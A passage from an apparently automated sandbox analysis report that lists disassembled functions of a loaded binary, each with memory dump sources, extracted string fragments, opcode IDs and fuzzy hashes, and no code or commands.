                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75323476A495418FCF048E7CC5953DE3BF6EB47364F30A219D825EBB95C63A890ACB40
                                                                                                                                                                                                                                              Function 6CE28D10 Relevance: 1.8, Strings: 1, Instructions: 566COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                              • API String ID: 0-410509341
                                                                                                                                                                                                                                              • Opcode ID: 2833791a1c12f7b3fffa124362b885ba041d1b4b3055d3f048b54c4aec56d951
                                                                                                                                                                                                                                              • Instruction ID: 42b7556d00b975c078b2d7c5f9c6686c1174828c527e7a539fe052ad707d43c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2833791a1c12f7b3fffa124362b885ba041d1b4b3055d3f048b54c4aec56d951
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07120376A456058FDF14CE7CD5D43CD7BF2AB47328F30A216D921EBB94D22E890A8B14
                                                                                                                                                                                                                                              Function 6CE15670 Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: g}TJ
                                                                                                                                                                                                                                              • API String ID: 0-2470632315
                                                                                                                                                                                                                                              • Opcode ID: 6feab2497fa58f3d11b5f3095cbb8e9a23c579e4031644c895a7c611c329fb06
                                                                                                                                                                                                                                              • Instruction ID: 1a67a3c3f99518f9fcaee7846e0ef773a8b243f9a04ebcc4519bc6b5aee16a53
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6feab2497fa58f3d11b5f3095cbb8e9a23c579e4031644c895a7c611c329fb06
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF020336B4A5418FCB048D7CD8D57EE77F2AB47368F305529C421DBF94C62A890A8B91
                                                                                                                                                                                                                                              Function 6CE29500 Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: t70p
                                                                                                                                                                                                                                              • API String ID: 0-1803443213
                                                                                                                                                                                                                                              • Opcode ID: 1bbb16efe10b4fb3d6d78aa450d4e50cc86e8e85607820d447311bb88b55e184
                                                                                                                                                                                                                                              • Instruction ID: a783cc32f762b0a15b996ec0aa407ba0a7974888724f4f796979ad07beaf8f1e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bbb16efe10b4fb3d6d78aa450d4e50cc86e8e85607820d447311bb88b55e184
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F812EE36A556048FCB08CE7CD5917DD7BF2AB8B314F20A119E425EB7A4C63E890ACB15
                                                                                                                                                                                                                                              Function 6CDF1010 Relevance: 1.8, Strings: 1, Instructions: 556COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • bmnvidjapmuqvqlivxazircppbjomunmxpjyeiwubtphnmhendbjxyloyarbch, xrefs: 6CDF1583
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: bmnvidjapmuqvqlivxazircppbjomunmxpjyeiwubtphnmhendbjxyloyarbch
                                                                                                                                                                                                                                              • API String ID: 0-3515426038
                                                                                                                                                                                                                                              • Opcode ID: e1d2b16538e04cbe1fadafe67480b1fbf9d500f0cb5803a9a88e4ce23c257747
                                                                                                                                                                                                                                              • Instruction ID: 81f7361f69d96ef20b250b4a43511868426e99e3dc3a69ab47d65caee7970c6e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1d2b16538e04cbe1fadafe67480b1fbf9d500f0cb5803a9a88e4ce23c257747
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F70207B6744A018FD7188F3CC5957C677F2BB87324F159A19C4A6CBFA4D626E40E8B80
                                                                                                                                                                                                                                              Function 6CE2C060 Relevance: 1.7, Strings: 1, Instructions: 481COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: vx[
                                                                                                                                                                                                                                              • API String ID: 0-1618767382
                                                                                                                                                                                                                                              • Opcode ID: 1489afea2681ca696c2cb5d755d06d6935a73beaeb55df8ceff4aa9f07c1c576
                                                                                                                                                                                                                                              • Instruction ID: 28d6666875bda9a0e5cc32b3fc97de76492f4320f238360a265584cc31a6c769
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1489afea2681ca696c2cb5d755d06d6935a73beaeb55df8ceff4aa9f07c1c576
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF1CF7AB442118FEF049E7CC9813EE77F2AB87364F2496199921D7794C23EC90A8F51
                                                                                                                                                                                                                                              Function 6CE12760 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: =s[e
                                                                                                                                                                                                                                              • API String ID: 0-287651873
                                                                                                                                                                                                                                              • Opcode ID: 6414cc860c766be9929b858b1d6b73c85d63d93eb6d470c23cd23299e3bf9c83
                                                                                                                                                                                                                                              • Instruction ID: 70a6401bb4cfd3cc67745af598006c39db57999d563954248c208f28518d3152
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6414cc860c766be9929b858b1d6b73c85d63d93eb6d470c23cd23299e3bf9c83
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9E11836A595418FDF08CE7CC8E93DE77F2EB67364F209215D821EBB94C22A450ACB54
                                                                                                                                                                                                                                              Function 6CE2F0D8 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CE2F0EE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                                                              • Opcode ID: ff22d280a4f3d913dd47a1c8d8ccfaed8819c6dafabb9ede77269890f8acd919
                                                                                                                                                                                                                                              • Instruction ID: 7caa226cc52c4b58dca9735b8fd2e849539e679b67746d5c0be37b96f6b9b2e3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff22d280a4f3d913dd47a1c8d8ccfaed8819c6dafabb9ede77269890f8acd919
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F75190B6A122168FEB05CF55C98179EBBF0FB4A318F30842AD415EB781D3B89A41CF50
                                                                                                                                                                                                                                              Function 6CE331E0 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4b33c019277ace265abf0dd5da26408d38403146fce336ac25661ce7643274d3
                                                                                                                                                                                                                                              • Instruction ID: 3e78518c305e064eda7456e2d5c7767fe4a9b121639e17cfed4e9194f2eeec23
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b33c019277ace265abf0dd5da26408d38403146fce336ac25661ce7643274d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B74186B5805128AFDB109F69CC88EEABBB9AF45308F2452DDE45DD3600DA35AE85CF50
                                                                                                                                                                                                                                              Function 6CE1E380 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 2N"
                                                                                                                                                                                                                                              • API String ID: 0-3685128319
                                                                                                                                                                                                                                              • Opcode ID: de2497aaf4cf326aba3612de5471f164d4306ae00da4f478bbde8ac74a834f65
                                                                                                                                                                                                                                              • Instruction ID: 86ad57ffff81c38077f4eafed72ae2c85f767463fe57d1e98759d2e4912cfbdd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de2497aaf4cf326aba3612de5471f164d4306ae00da4f478bbde8ac74a834f65
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAC1C236B489428FCB08CE7CC58A3DD77F2AB4B358F249515E815E7F54C12A9E0A8B91
                                                                                                                                                                                                                                              Function 6CE14D60 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: }Y#
                                                                                                                                                                                                                                              • API String ID: 0-2128481213
                                                                                                                                                                                                                                              • Opcode ID: 452d89b58c327d920f005979f87eddcf2e0827a7210d0c769dabf242f0ff2654
                                                                                                                                                                                                                                              • Instruction ID: 072835e60415f9e971b6e47fa19c9aa0caf7ab0b673d2e3597c0ae828c293946
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 452d89b58c327d920f005979f87eddcf2e0827a7210d0c769dabf242f0ff2654
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFB1E636A5A5068FDF08897CD5953DE3BF29B43328F319216D425DBF94C22A4A1A8B81
                                                                                                                                                                                                                                              Function 6CE208C0 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "Btd
                                                                                                                                                                                                                                              • API String ID: 0-1508767924
                                                                                                                                                                                                                                              • Opcode ID: 76095beb85db4f3272ec180271c4029df5c04780ecbd7f0a647bf48979c53136
                                                                                                                                                                                                                                              • Instruction ID: e28c414f1267603eb61d18742984fbe5a4e85bd318a2b508733d9f61b5029cc1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76095beb85db4f3272ec180271c4029df5c04780ecbd7f0a647bf48979c53136
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4A15A767451828FCF048D7CD5E63EE77F2AB83328F309A25C4259B7D5C22E4A0A8751
                                                                                                                                                                                                                                              Function 6CE1A390 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: G/b
                                                                                                                                                                                                                                              • API String ID: 0-808239343
                                                                                                                                                                                                                                              • Opcode ID: 33d24c1fad5914cb04170dc4a3aeb8981e9d822688fb18334b6928e5dae07548
                                                                                                                                                                                                                                              • Instruction ID: e177ae1424db7088a68f13ae4aff4418e32a3d55841e9f1f1474d553635276c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33d24c1fad5914cb04170dc4a3aeb8981e9d822688fb18334b6928e5dae07548
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F991E276E88218CFCB04CFACD4846EDBBF1EF4A314F20411AE815EBB54C639984ACB51
                                                                                                                                                                                                                                              Function 6CE12420 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 9(A
                                                                                                                                                                                                                                              • API String ID: 0-4252381773
                                                                                                                                                                                                                                              • Opcode ID: b87d1db05c18ff4670b8ab215c178a8c1892809245b771675b12381d17fa6c71
                                                                                                                                                                                                                                              • Instruction ID: 421f32f93cfb756d7d8c36725f0d7d109b18ea27c50f745018bec64332f79e72
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b87d1db05c18ff4670b8ab215c178a8c1892809245b771675b12381d17fa6c71
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF81F5B5A482058FCF04CEBCC9D87DEBBF2AB57324F249119D415E7B84D2398556CB21
                                                                                                                                                                                                                                              Function 6CDFCE50 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Va"
                                                                                                                                                                                                                                              • API String ID: 0-2974783962
                                                                                                                                                                                                                                              • Opcode ID: 919243fc953b5cf9b5509a4abe2f5427d748635f63dd9610be88a7439bee0839
                                                                                                                                                                                                                                              • Instruction ID: 46890463cae7efbddfae2dd7d562075144629fc40fa5537fd255e1a21fed6552
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 919243fc953b5cf9b5509a4abe2f5427d748635f63dd9610be88a7439bee0839
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6771F276A452058FDF04CF7CC8957DEBBF2BB8B364F21901AD460E7B64C239990A8B54
                                                                                                                                                                                                                                              Function 6CE1B7A0 Relevance: .9, Instructions: 928COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 49916591553a8a228a345fc46ca9dc96db5c25cdcc951f917ed7483687f4fcdb
                                                                                                                                                                                                                                              • Instruction ID: 46171a25eb8112cf6a500402089522f3169abad29e58bf1a158ddaa436b618d6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49916591553a8a228a345fc46ca9dc96db5c25cdcc951f917ed7483687f4fcdb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4623476F486448FDF08CE7CC5E53DE7BF2AB47324F205529D811DBBA1C62A990A8B41
                                                                                                                                                                                                                                              Function 6CE1FEE0 Relevance: .7, Instructions: 720COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b189d9cb31b5cc0f4f8160ffac9b20985c571f5cb3f1f2536ed52ddef9e0adfc
                                                                                                                                                                                                                                              • Instruction ID: 99ee2f95fd11ca896995af99c0e711c99563dcc27c55ebae1e91be29ee415715
